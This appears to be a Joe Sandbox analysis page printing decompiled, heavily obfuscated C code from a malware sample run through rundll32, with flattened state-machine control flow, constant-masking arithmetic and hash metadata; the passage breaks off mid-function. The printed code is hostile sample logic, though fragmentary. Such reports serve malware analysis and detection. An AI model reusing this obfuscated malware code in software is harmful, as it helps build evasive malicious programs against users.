                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t208);
                                                                                                                      				_v132 = 0x7182e5;
                                                                                                                      				_t301 =  &(( &_v156)[4]);
                                                                                                                      				_v132 = _v132 + 0x26fa;
                                                                                                                      				_t289 = 0;
                                                                                                                      				_t249 = 0xa47caa1;
                                                                                                                      				_t292 = 0x79;
                                                                                                                      				_v132 = _v132 / _t292;
                                                                                                                      				_t293 = 0x16;
                                                                                                                      				_v132 = _v132 / _t293;
                                                                                                                      				_v132 = _v132 ^ 0x00000aee;
                                                                                                                      				_v140 = 0x29ca9c;
                                                                                                                      				_v140 = _v140 + 0x24a5;
                                                                                                                      				_v140 = _v140 << 5;
                                                                                                                      				_v140 = _v140 + 0xffff55cc;
                                                                                                                      				_v140 = _v140 ^ 0x053d3dfc;
                                                                                                                      				_v136 = 0x4d5d35;
                                                                                                                      				_v136 = _v136 | 0x2dd38e58;
                                                                                                                      				_v136 = _v136 + 0xffffc96a;
                                                                                                                      				_v136 = _v136 | 0xcd817148;
                                                                                                                      				_v136 = _v136 ^ 0xedde351d;
                                                                                                                      				_v152 = 0x709b91;
                                                                                                                      				_t294 = 0x24;
                                                                                                                      				_v152 = _v152 / _t294;
                                                                                                                      				_v152 = _v152 | 0xc56f7625;
                                                                                                                      				_v152 = _v152 << 6;
                                                                                                                      				_v152 = _v152 ^ 0x5bd1c7f0;
                                                                                                                      				_v144 = 0x2195b1;
                                                                                                                      				_v144 = _v144 | 0x0c2b25b9;
                                                                                                                      				_v144 = _v144 << 8;
                                                                                                                      				_v144 = _v144 | 0x32a70c97;
                                                                                                                      				_v144 = _v144 ^ 0x3bb2e9a3;
                                                                                                                      				_v120 = 0x3a67b3;
                                                                                                                      				_v120 = _v120 + 0xffff86f2;
                                                                                                                      				_v120 = _v120 + 0xf6d6;
                                                                                                                      				_v120 = _v120 ^ 0x00358b42;
                                                                                                                      				_v108 = 0x732c66;
                                                                                                                      				_t68 =  &_v108; // 0x732c66
                                                                                                                      				_t295 = 0x35;
                                                                                                                      				_v108 =  *_t68 / _t295;
                                                                                                                      				_v108 = _v108 << 0xb;
                                                                                                                      				_v108 = _v108 ^ 0x11669525;
                                                                                                                      				_v156 = 0x38089d;
                                                                                                                      				_v156 = _v156 ^ 0x13a0f5b7;
                                                                                                                      				_v156 = _v156 | 0xc9f1c7ca;
                                                                                                                      				_v156 = _v156 << 0xf;
                                                                                                                      				_v156 = _v156 ^ 0xfffe1365;
                                                                                                                      				_v128 = 0x743938;
                                                                                                                      				_v128 = _v128 ^ 0xec4d11e9;
                                                                                                                      				_v128 = _v128 | 0xa250e655;
                                                                                                                      				_v128 = _v128 * 0x41;
                                                                                                                      				_v128 = _v128 ^ 0x8cf42415;
                                                                                                                      				_v100 = 0x6d926d;
                                                                                                                      				_t296 = 0x34;
                                                                                                                      				_v100 = _v100 / _t296;
                                                                                                                      				_v100 = _v100 ^ 0x000eb1c4;
                                                                                                                      				_v116 = 0xefa621;
                                                                                                                      				_v116 = _v116 + 0xffff82bb;
                                                                                                                      				_t297 = 0x3d;
                                                                                                                      				_v116 = _v116 * 0x32;
                                                                                                                      				_v116 = _v116 ^ 0x2eb07dcc;
                                                                                                                      				_v88 = 0x5b377;
                                                                                                                      				_v88 = _v88 + 0x8d9;
                                                                                                                      				_v88 = _v88 ^ 0x00067740;
                                                                                                                      				_v112 = 0x4d19ae;
                                                                                                                      				_v112 = _v112 ^ 0x630c5599;
                                                                                                                      				_v112 = _v112 ^ 0xe5b09bfb;
                                                                                                                      				_v112 = _v112 ^ 0x86f4ef46;
                                                                                                                      				_v148 = 0x4966c6;
                                                                                                                      				_v148 = _v148 / _t297;
                                                                                                                      				_v148 = _v148 << 1;
                                                                                                                      				_v148 = _v148 ^ 0x19f6490a;
                                                                                                                      				_v148 = _v148 ^ 0x19fea643;
                                                                                                                      				_v104 = 0x4e28a7;
                                                                                                                      				_v104 = _v104 ^ 0x0c2039e4;
                                                                                                                      				_t298 = 0x43;
                                                                                                                      				_v104 = _v104 / _t298;
                                                                                                                      				_v104 = _v104 ^ 0x002b1fa2;
                                                                                                                      				_v96 = 0xfd59a6;
                                                                                                                      				_v96 = _v96 ^ 0x1da99ba6;
                                                                                                                      				_v96 = _v96 ^ 0x1d58c7ea;
                                                                                                                      				_v92 = 0x8125dc;
                                                                                                                      				_v92 = _v92 << 7;
                                                                                                                      				_v92 = _v92 ^ 0x409d3f45;
                                                                                                                      				_v124 = 0x45818f;
                                                                                                                      				_v124 = _v124 ^ 0x2c821393;
                                                                                                                      				_v124 = _v124 << 0xc;
                                                                                                                      				_v124 = _v124 + 0x7cf7;
                                                                                                                      				_v124 = _v124 ^ 0x792e1e67;
                                                                                                                      				do {
                                                                                                                      					while(_t249 != 0x4baccf8) {
                                                                                                                      						if(_t249 == 0x7c30f3d) {
                                                                                                                      							_t231 = E002C64F1( &_v52, _v156,  &_v16, _v128);
                                                                                                                      							_pop(_t254);
                                                                                                                      							if(_t231 != 0) {
                                                                                                                      								_push(_t254);
                                                                                                                      								_t242 = E002C3512(_v48);
                                                                                                                      								 *_t291 = _t242;
                                                                                                                      								if(_t242 != 0) {
                                                                                                                      									E002CFD29(_v52, _v112,  *_t291, _v148, _v48);
                                                                                                                      									_t301 =  &(_t301[3]);
                                                                                                                      									 *((intOrPtr*)(_t291 + 4)) = _v48;
                                                                                                                      									_t289 = 1;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							_t249 = 0xf7122fc;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t249 == 0x9cf6742) {
                                                                                                                      							_t234 = E002D04DE(_v144, _v120,  &_v76,  &_v68, _v108);
                                                                                                                      							_t301 =  &(_t301[3]);
                                                                                                                      							asm("sbb ecx, ecx");
                                                                                                                      							_t249 = ( ~_t234 & 0xf851ec41) + 0xf7122fc;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t249 == 0xa47caa1) {
                                                                                                                      							_t249 = 0x4baccf8;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t249 == 0xbfbcb36) {
                                                                                                                      							if(E002CCC89( &_v76,  &_v84, _v152) == 0) {
                                                                                                                      								L8:
                                                                                                                      								return _t289;
                                                                                                                      							}
                                                                                                                      							_t249 = 0x9cf6742;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t249 != 0xf7122fc) {
                                                                                                                      							goto L25;
                                                                                                                      						}
                                                                                                                      						E002B68DE(_v104, _v96, _v92, _v124, _v76);
                                                                                                                      						goto L8;
                                                                                                                      					}
                                                                                                                      					_t226 =  *((intOrPtr*)(_t247 + 4));
                                                                                                                      					_t250 =  *_t247;
                                                                                                                      					_v80 = _t226;
                                                                                                                      					_v84 = _t250;
                                                                                                                      					_t228 = _t226 - 1 + _t250;
                                                                                                                      					while(_t228 > _t250) {
                                                                                                                      						if( *_t228 == 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						_t228 = _t228 - 1;
                                                                                                                      					}
                                                                                                                      					_t229 = _t228 - _t250;
                                                                                                                      					_v80 = _t229;
                                                                                                                      					if(_t229 == 0) {
                                                                                                                      						L24:
                                                                                                                      						_t249 = 0xbfbcb36;
                                                                                                                      						goto L25;
                                                                                                                      					}
                                                                                                                      					while(_v80 % _v140 != _v132) {
                                                                                                                      						_t206 =  &_v80;
                                                                                                                      						 *_t206 = _v80 - 1;
                                                                                                                      						if( *_t206 != 0) {
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						goto L24;
                                                                                                                      					}
                                                                                                                      					goto L24;
                                                                                                                      					L25:
                                                                                                                      				} while (_t249 != 0x4e0187e);
                                                                                                                      				goto L8;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 5]M$89t$f,s
                                                                                                                      • API String ID: 0-187558970
                                                                                                                      • Opcode ID: b8f6f788a1341fb326c7f6acff40e4f4ddc65e0342340909664983d1fd6761a5
                                                                                                                      • Instruction ID: 9c769dadf51b7b867526c2dc8020d128757826eb196477cc65141532401e4785
                                                                                                                      • Opcode Fuzzy Hash: b8f6f788a1341fb326c7f6acff40e4f4ddc65e0342340909664983d1fd6761a5
                                                                                                                      • Instruction Fuzzy Hash: 9CB143B15183819FC358CF25C88955BBBF1FBC8398F108A1DF19696260D7B68A98CF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E002B3FB8() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				signed int _v1044;
                                                                                                                      				signed int _v1048;
                                                                                                                      				intOrPtr _v1052;
                                                                                                                      				intOrPtr _v1056;
                                                                                                                      				signed int _v1060;
                                                                                                                      				signed int _v1064;
                                                                                                                      				signed int _v1068;
                                                                                                                      				signed int _v1072;
                                                                                                                      				signed int _v1076;
                                                                                                                      				signed int _v1080;
                                                                                                                      				signed int _v1084;
                                                                                                                      				signed int _v1088;
                                                                                                                      				signed int _v1092;
                                                                                                                      				signed int _v1096;
                                                                                                                      				signed int _v1100;
                                                                                                                      				signed int _v1104;
                                                                                                                      				signed int _v1108;
                                                                                                                      				signed int _v1112;
                                                                                                                      				signed int _v1116;
                                                                                                                      				signed int _v1120;
                                                                                                                      				signed int _v1124;
                                                                                                                      				signed int _v1128;
                                                                                                                      				signed int _v1132;
                                                                                                                      				signed int _v1136;
                                                                                                                      				signed int _v1140;
                                                                                                                      				signed int _v1144;
                                                                                                                      				signed int _v1148;
                                                                                                                      				signed int _v1152;
                                                                                                                      				signed int _v1156;
                                                                                                                      				signed int _v1160;
                                                                                                                      				signed int _v1164;
                                                                                                                      				signed int _v1168;
                                                                                                                      				signed int _v1172;
                                                                                                                      				void* _t262;
                                                                                                                      				intOrPtr _t274;
                                                                                                                      				void* _t279;
                                                                                                                      				intOrPtr _t281;
                                                                                                                      				intOrPtr _t283;
                                                                                                                      				signed int _t305;
                                                                                                                      				signed int _t306;
                                                                                                                      				signed int* _t309;
                                                                                                                      
                                                                                                                      				_t309 =  &_v1172;
                                                                                                                      				_v1048 = _v1048 & 0x00000000;
                                                                                                                      				_v1044 = _v1044 & 0x00000000;
                                                                                                                      				_t279 = 0xa0c284c;
                                                                                                                      				_v1056 = 0xafe7d9;
                                                                                                                      				_v1052 = 0x960b65;
                                                                                                                      				_v1120 = 0x40f49c;
                                                                                                                      				_v1120 = _v1120 + 0xc807;
                                                                                                                      				_v1120 = _v1120 * 0x4f;
                                                                                                                      				_v1120 = _v1120 ^ 0x1446f881;
                                                                                                                      				_v1116 = 0x6254e6;
                                                                                                                      				_t305 = 3;
                                                                                                                      				_v1116 = _v1116 * 5;
                                                                                                                      				_v1116 = _v1116 + 0xcc41;
                                                                                                                      				_v1116 = _v1116 ^ 0x01ee9a48;
                                                                                                                      				_v1104 = 0xc01800;
                                                                                                                      				_v1104 = _v1104 | 0x48a752a3;
                                                                                                                      				_v1104 = _v1104 ^ 0x48e65f13;
                                                                                                                      				_v1128 = 0x7c2fed;
                                                                                                                      				_v1128 = _v1128 | 0x2c3c97c8;
                                                                                                                      				_v1128 = _v1128 * 0x77;
                                                                                                                      				_v1128 = _v1128 ^ 0xadff29d3;
                                                                                                                      				_v1136 = 0x195939;
                                                                                                                      				_v1136 = _v1136 + 0xfffffbae;
                                                                                                                      				_v1136 = _v1136 * 0x49;
                                                                                                                      				_v1136 = _v1136 ^ 0x073ad8c6;
                                                                                                                      				_v1168 = 0xbc4bb5;
                                                                                                                      				_v1168 = _v1168 / _t305;
                                                                                                                      				_v1168 = _v1168 << 0xd;
                                                                                                                      				_v1168 = _v1168 ^ 0xd1f3631f;
                                                                                                                      				_v1168 = _v1168 ^ 0x0980812e;
                                                                                                                      				_v1084 = 0x2affe9;
                                                                                                                      				_v1084 = _v1084 >> 0xd;
                                                                                                                      				_v1084 = _v1084 ^ 0x00075e3f;
                                                                                                                      				_v1112 = 0x7143ab;
                                                                                                                      				_v1112 = _v1112 >> 0xb;
                                                                                                                      				_t306 = 0x4a;
                                                                                                                      				_v1112 = _v1112 / _t306;
                                                                                                                      				_v1112 = _v1112 ^ 0x000905fb;
                                                                                                                      				_v1100 = 0xf39387;
                                                                                                                      				_v1100 = _v1100 + 0xffffb245;
                                                                                                                      				_v1100 = _v1100 ^ 0x00f5952a;
                                                                                                                      				_v1160 = 0xdc501f;
                                                                                                                      				_v1160 = _v1160 >> 0xb;
                                                                                                                      				_v1160 = _v1160 | 0xffab4649;
                                                                                                                      				_v1160 = _v1160 * 0x4a;
                                                                                                                      				_v1160 = _v1160 ^ 0xe7809492;
                                                                                                                      				_v1076 = 0x9b6a27;
                                                                                                                      				_v1076 = _v1076 >> 9;
                                                                                                                      				_v1076 = _v1076 ^ 0x0000c221;
                                                                                                                      				_v1132 = 0x7dd85e;
                                                                                                                      				_v1132 = _v1132 + 0xffff3c07;
                                                                                                                      				_v1132 = _v1132 ^ 0x5ccf103a;
                                                                                                                      				_v1132 = _v1132 ^ 0x5cb197cc;
                                                                                                                      				_v1060 = 0x3a660e;
                                                                                                                      				_v1060 = _v1060 ^ 0x9c30fae7;
                                                                                                                      				_v1060 = _v1060 ^ 0x9c0496c9;
                                                                                                                      				_v1124 = 0xd6fa60;
                                                                                                                      				_v1124 = _v1124 >> 0xc;
                                                                                                                      				_v1124 = _v1124 * 0x63;
                                                                                                                      				_v1124 = _v1124 ^ 0x0000f3a0;
                                                                                                                      				_v1088 = 0xffa7cd;
                                                                                                                      				_v1088 = _v1088 ^ 0xcc4f33e8;
                                                                                                                      				_v1088 = _v1088 ^ 0xccbde027;
                                                                                                                      				_v1096 = 0xc2302a;
                                                                                                                      				_v1096 = _v1096 ^ 0x3cf81aba;
                                                                                                                      				_v1096 = _v1096 ^ 0x3c3bc632;
                                                                                                                      				_v1064 = 0x2b9d03;
                                                                                                                      				_v1064 = _v1064 + 0xffffce76;
                                                                                                                      				_v1064 = _v1064 ^ 0x0029f92b;
                                                                                                                      				_v1164 = 0x820e56;
                                                                                                                      				_v1164 = _v1164 >> 0xd;
                                                                                                                      				_v1164 = _v1164 + 0xa8ad;
                                                                                                                      				_v1164 = _v1164 | 0xfa0f2dae;
                                                                                                                      				_v1164 = _v1164 ^ 0xfa046831;
                                                                                                                      				_v1068 = 0x2883d9;
                                                                                                                      				_v1068 = _v1068 + 0xffff633a;
                                                                                                                      				_v1068 = _v1068 ^ 0x0026d05d;
                                                                                                                      				_v1156 = 0x6f33fd;
                                                                                                                      				_v1156 = _v1156 << 0xe;
                                                                                                                      				_v1156 = _v1156 + 0xfcd0;
                                                                                                                      				_v1156 = _v1156 + 0x75bd;
                                                                                                                      				_v1156 = _v1156 ^ 0xcd0f8dab;
                                                                                                                      				_v1172 = 0xb8c1fe;
                                                                                                                      				_v1172 = _v1172 << 6;
                                                                                                                      				_v1172 = _v1172 * 0x6a;
                                                                                                                      				_v1172 = _v1172 << 4;
                                                                                                                      				_v1172 = _v1172 ^ 0x014ff662;
                                                                                                                      				_v1148 = 0xbed93a;
                                                                                                                      				_v1148 = _v1148 * 0x3e;
                                                                                                                      				_v1148 = _v1148 << 0xa;
                                                                                                                      				_v1148 = _v1148 ^ 0x5e071c48;
                                                                                                                      				_v1148 = _v1148 ^ 0xbc7b36e3;
                                                                                                                      				_v1092 = 0x46d8d3;
                                                                                                                      				_v1092 = _v1092 << 5;
                                                                                                                      				_v1092 = _v1092 ^ 0x08d1099a;
                                                                                                                      				_v1140 = 0x5a5c4c;
                                                                                                                      				_v1140 = _v1140 ^ 0xa959b0b3;
                                                                                                                      				_v1140 = _v1140 << 3;
                                                                                                                      				_v1140 = _v1140 ^ 0x481958d7;
                                                                                                                      				_v1080 = 0xac3d63;
                                                                                                                      				_v1080 = _v1080 * 0x50;
                                                                                                                      				_v1080 = _v1080 ^ 0x35d8e2dc;
                                                                                                                      				_v1152 = 0x840294;
                                                                                                                      				_v1152 = _v1152 + 0xffff0ee6;
                                                                                                                      				_v1152 = _v1152 ^ 0xf9fb415c;
                                                                                                                      				_v1152 = _v1152 | 0x82095beb;
                                                                                                                      				_v1152 = _v1152 ^ 0xfb725375;
                                                                                                                      				_v1072 = 0xb67c6d;
                                                                                                                      				_v1072 = _v1072 + 0xffffc0d8;
                                                                                                                      				_v1072 = _v1072 ^ 0x00b2e767;
                                                                                                                      				_v1144 = 0x5c5bd3;
                                                                                                                      				_v1144 = _v1144 ^ 0x420c1b91;
                                                                                                                      				_v1144 = _v1144 * 0x79;
                                                                                                                      				_v1144 = _v1144 >> 9;
                                                                                                                      				_v1144 = _v1144 ^ 0x002d898c;
                                                                                                                      				_v1108 = 0xefd7e6;
                                                                                                                      				_v1108 = _v1108 * 0x73;
                                                                                                                      				_v1108 = _v1108 * 0x61;
                                                                                                                      				_v1108 = _v1108 ^ 0xd2fa3683;
                                                                                                                      				do {
                                                                                                                      					while(_t279 != 0x10bc038) {
                                                                                                                      						if(_t279 == 0x5d7fb4e) {
                                                                                                                      							E002C41A7();
                                                                                                                      							L11:
                                                                                                                      							_t279 = 0x10bc038;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t279 == 0x666e3d5) {
                                                                                                                      							E002B44FA( &_v520, _v1064, _v1164, _v1068, _v1156);
                                                                                                                      							_push( &_v1040);
                                                                                                                      							_push( &_v520);
                                                                                                                      							_push(_v1092);
                                                                                                                      							E002B8D95(_v1172, _v1148, __eflags);
                                                                                                                      							_t309 =  &(_t309[6]);
                                                                                                                      							_t279 = 0xe0c3523;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t279 == 0x90d07ee) {
                                                                                                                      							_t274 = E002C04B8();
                                                                                                                      							goto L11;
                                                                                                                      						}
                                                                                                                      						if(_t279 == 0xa0c284c) {
                                                                                                                      							_t274 =  *0x2d520c; // 0x0
                                                                                                                      							__eflags =  *((intOrPtr*)(_t274 + 0x438));
                                                                                                                      							_t279 =  !=  ? 0x90d07ee : 0x5d7fb4e;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t279 != 0xe0c3523) {
                                                                                                                      							goto L15;
                                                                                                                      						}
                                                                                                                      						 *((short*)(E002C4FA8(_v1140,  &_v1040, _v1080, _v1152))) = 0;
                                                                                                                      						return E002B5B6B(_v1072, _v1144,  &_v1040, _v1108);
                                                                                                                      					}
                                                                                                                      					_push(_v1112);
                                                                                                                      					_push(_v1084);
                                                                                                                      					_push(0x2b10cc);
                                                                                                                      					_t262 = E002BAB66(_v1136, _v1168, __eflags);
                                                                                                                      					_t281 =  *0x2d520c; // 0x0
                                                                                                                      					_t283 =  *0x2d520c; // 0x0
                                                                                                                      					__eflags = _t283 + 8;
                                                                                                                      					E002BE7CE(_t262, _t283 + 8, _v1100, _t283 + 8, _t281 + 0x220, _v1160, _v1076, _v1132, _v1060, _t281 + 0x220);
                                                                                                                      					E002BAE03(_v1124, _v1088, _v1096, _t262);
                                                                                                                      					_t309 =  &(_t309[0xd]);
                                                                                                                      					_t279 = 0x666e3d5;
                                                                                                                      					L15:
                                                                                                                      					__eflags = _t279 - 0xfda68b3;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t274;
                                                                                                                      			}














































                                                                                                                      0x002b4105
                                                                                                                      0x002b410a
                                                                                                                      0x002b4117
                                                                                                                      0x002b411b
                                                                                                                      0x002b4123
                                                                                                                      0x002b412b
                                                                                                                      0x002b4130
                                                                                                                      0x002b4138
                                                                                                                      0x002b4140
                                                                                                                      0x002b4148
                                                                                                                      0x002b4150
                                                                                                                      0x002b4158
                                                                                                                      0x002b4163
                                                                                                                      0x002b416e
                                                                                                                      0x002b4179
                                                                                                                      0x002b4181
                                                                                                                      0x002b418b
                                                                                                                      0x002b418f
                                                                                                                      0x002b4197
                                                                                                                      0x002b419f
                                                                                                                      0x002b41a7
                                                                                                                      0x002b41af
                                                                                                                      0x002b41bc
                                                                                                                      0x002b41c9
                                                                                                                      0x002b41d6
                                                                                                                      0x002b41de
                                                                                                                      0x002b41e6
                                                                                                                      0x002b41ee
                                                                                                                      0x002b41f6
                                                                                                                      0x002b41fb
                                                                                                                      0x002b4203
                                                                                                                      0x002b420b
                                                                                                                      0x002b4213
                                                                                                                      0x002b421b
                                                                                                                      0x002b4223
                                                                                                                      0x002b422b
                                                                                                                      0x002b4233
                                                                                                                      0x002b4238
                                                                                                                      0x002b4240
                                                                                                                      0x002b4248
                                                                                                                      0x002b4250
                                                                                                                      0x002b4258
                                                                                                                      0x002b4262
                                                                                                                      0x002b4266
                                                                                                                      0x002b426b
                                                                                                                      0x002b4273
                                                                                                                      0x002b4280
                                                                                                                      0x002b4284
                                                                                                                      0x002b4289
                                                                                                                      0x002b4291
                                                                                                                      0x002b4299
                                                                                                                      0x002b42a1
                                                                                                                      0x002b42a6
                                                                                                                      0x002b42ae
                                                                                                                      0x002b42b6
                                                                                                                      0x002b42be
                                                                                                                      0x002b42c3
                                                                                                                      0x002b42cb
                                                                                                                      0x002b42d8
                                                                                                                      0x002b42dc
                                                                                                                      0x002b42e4
                                                                                                                      0x002b42ec
                                                                                                                      0x002b42f4
                                                                                                                      0x002b42fc
                                                                                                                      0x002b4304
                                                                                                                      0x002b430c
                                                                                                                      0x002b4314
                                                                                                                      0x002b431c
                                                                                                                      0x002b4324
                                                                                                                      0x002b432c
                                                                                                                      0x002b4339
                                                                                                                      0x002b433d
                                                                                                                      0x002b4342
                                                                                                                      0x002b434a
                                                                                                                      0x002b4357
                                                                                                                      0x002b4360
                                                                                                                      0x002b4364
                                                                                                                      0x002b436c
                                                                                                                      0x002b436c
                                                                                                                      0x002b4376
                                                                                                                      0x002b4466
                                                                                                                      0x002b440a
                                                                                                                      0x002b440a
                                                                                                                      0x00000000
                                                                                                                      0x002b440a
                                                                                                                      0x002b4382
                                                                                                                      0x002b442b
                                                                                                                      0x002b4437
                                                                                                                      0x002b443f
                                                                                                                      0x002b4440
                                                                                                                      0x002b444c
                                                                                                                      0x002b4451
                                                                                                                      0x002b4454
                                                                                                                      0x00000000
                                                                                                                      0x002b4454
                                                                                                                      0x002b438a
                                                                                                                      0x002b4405
                                                                                                                      0x00000000
                                                                                                                      0x002b4405
                                                                                                                      0x002b4392
                                                                                                                      0x002b43e7
                                                                                                                      0x002b43ee
                                                                                                                      0x002b43f5
                                                                                                                      0x00000000
                                                                                                                      0x002b43f5
                                                                                                                      0x002b439a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b43c2
                                                                                                                      0x00000000
                                                                                                                      0x002b43d9
                                                                                                                      0x002b446d
                                                                                                                      0x002b4471
                                                                                                                      0x002b447d
                                                                                                                      0x002b4482
                                                                                                                      0x002b4487
                                                                                                                      0x002b44af
                                                                                                                      0x002b44b5
                                                                                                                      0x002b44c4
                                                                                                                      0x002b44dc
                                                                                                                      0x002b44e1
                                                                                                                      0x002b44e4
                                                                                                                      0x002b44e9
                                                                                                                      0x002b44e9
                                                                                                                      0x002b44e9
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: L\Z$/|$Tb
                                                                                                                      • API String ID: 0-3338791969
                                                                                                                      • Opcode ID: eab0be4a832b0909a5edeba7593981d0aefe50b8bdf36d0fd20895e3e84a7d3b
                                                                                                                      • Instruction ID: 5efa360e1faeda82c092d61fd407dcbfe3015cd9fce659e1fd3c23649aa77102
                                                                                                                      • Opcode Fuzzy Hash: eab0be4a832b0909a5edeba7593981d0aefe50b8bdf36d0fd20895e3e84a7d3b
                                                                                                                      • Instruction Fuzzy Hash: 3AD100714183818FC768DF61C48A65FFBE0FBC4748F208A1DF2A696261D7B58A59CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E002BF93D() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				intOrPtr _v1044;
                                                                                                                      				intOrPtr _v1048;
                                                                                                                      				intOrPtr _v1052;
                                                                                                                      				intOrPtr _v1056;
                                                                                                                      				signed int _v1060;
                                                                                                                      				signed int _v1064;
                                                                                                                      				signed int _v1068;
                                                                                                                      				signed int _v1072;
                                                                                                                      				signed int _v1076;
                                                                                                                      				signed int _v1080;
                                                                                                                      				signed int _v1084;
                                                                                                                      				signed int _v1088;
                                                                                                                      				signed int _v1092;
                                                                                                                      				signed int _v1096;
                                                                                                                      				signed int _v1100;
                                                                                                                      				signed int _v1104;
                                                                                                                      				signed int _v1108;
                                                                                                                      				signed int _v1112;
                                                                                                                      				signed int _v1116;
                                                                                                                      				signed int _v1120;
                                                                                                                      				signed int _v1124;
                                                                                                                      				signed int _v1128;
                                                                                                                      				signed int _v1132;
                                                                                                                      				signed int _v1136;
                                                                                                                      				signed int _v1140;
                                                                                                                      				void* _t255;
                                                                                                                      				void* _t258;
                                                                                                                      				intOrPtr _t259;
                                                                                                                      				intOrPtr _t261;
                                                                                                                      				void* _t266;
                                                                                                                      				intOrPtr _t302;
                                                                                                                      				signed int _t303;
                                                                                                                      				signed int _t304;
                                                                                                                      				signed int _t305;
                                                                                                                      				signed int _t306;
                                                                                                                      				signed int _t307;
                                                                                                                      				signed int _t308;
                                                                                                                      				signed int _t309;
                                                                                                                      				signed int _t310;
                                                                                                                      				signed int _t311;
                                                                                                                      				signed int _t312;
                                                                                                                      				signed int* _t315;
                                                                                                                      
                                                                                                                      				_t315 =  &_v1140;
                                                                                                                      				_v1056 = 0x7fa207;
                                                                                                                      				_v1052 = 0x3c49bf;
                                                                                                                      				_t266 = 0x35a8362;
                                                                                                                      				_t302 = 0;
                                                                                                                      				_v1048 = 0;
                                                                                                                      				_v1044 = 0;
                                                                                                                      				_v1060 = 0xe96fdd;
                                                                                                                      				_v1060 = _v1060 + 0xffff4dc5;
                                                                                                                      				_v1060 = _v1060 ^ 0x00e8fae7;
                                                                                                                      				_v1084 = 0x95aacc;
                                                                                                                      				_t303 = 0x76;
                                                                                                                      				_v1084 = _v1084 / _t303;
                                                                                                                      				_v1084 = _v1084 ^ 0x00004e07;
                                                                                                                      				_v1132 = 0x8ad3c0;
                                                                                                                      				_t304 = 0x3b;
                                                                                                                      				_v1132 = _v1132 / _t304;
                                                                                                                      				_t305 = 5;
                                                                                                                      				_v1132 = _v1132 / _t305;
                                                                                                                      				_t306 = 0x2e;
                                                                                                                      				_v1132 = _v1132 / _t306;
                                                                                                                      				_v1132 = _v1132 ^ 0x0002326f;
                                                                                                                      				_v1136 = 0x5025c5;
                                                                                                                      				_v1136 = _v1136 | 0xd1709035;
                                                                                                                      				_v1136 = _v1136 + 0xfffff598;
                                                                                                                      				_v1136 = _v1136 | 0xced027f9;
                                                                                                                      				_v1136 = _v1136 ^ 0xdffed43e;
                                                                                                                      				_v1076 = 0x8b6e07;
                                                                                                                      				_v1076 = _v1076 ^ 0x693ed631;
                                                                                                                      				_v1076 = _v1076 ^ 0x69bbe5bc;
                                                                                                                      				_v1096 = 0x201396;
                                                                                                                      				_v1096 = _v1096 ^ 0x88694b71;
                                                                                                                      				_v1096 = _v1096 + 0xffff467e;
                                                                                                                      				_v1096 = _v1096 ^ 0x884e23ab;
                                                                                                                      				_v1068 = 0x6d8c34;
                                                                                                                      				_v1068 = _v1068 ^ 0x91e2fcbf;
                                                                                                                      				_v1068 = _v1068 ^ 0x9185a139;
                                                                                                                      				_v1128 = 0x807b8c;
                                                                                                                      				_v1128 = _v1128 | 0x3609e9e3;
                                                                                                                      				_v1128 = _v1128 + 0xffff6ddf;
                                                                                                                      				_v1128 = _v1128 + 0xffffdf1a;
                                                                                                                      				_v1128 = _v1128 ^ 0x3687a3ab;
                                                                                                                      				_v1104 = 0xe6d4b9;
                                                                                                                      				_v1104 = _v1104 >> 0xd;
                                                                                                                      				_t307 = 0x48;
                                                                                                                      				_v1104 = _v1104 / _t307;
                                                                                                                      				_v1104 = _v1104 * 0x6c;
                                                                                                                      				_v1104 = _v1104 ^ 0x0006818d;
                                                                                                                      				_v1064 = 0xd65a00;
                                                                                                                      				_v1064 = _v1064 + 0x372a;
                                                                                                                      				_v1064 = _v1064 ^ 0x00dea864;
                                                                                                                      				_v1088 = 0x4d0087;
                                                                                                                      				_v1088 = _v1088 + 0xffffb4c7;
                                                                                                                      				_v1088 = _v1088 ^ 0x0a5aafbb;
                                                                                                                      				_v1088 = _v1088 ^ 0x0a1526df;
                                                                                                                      				_v1092 = 0x9c5ab3;
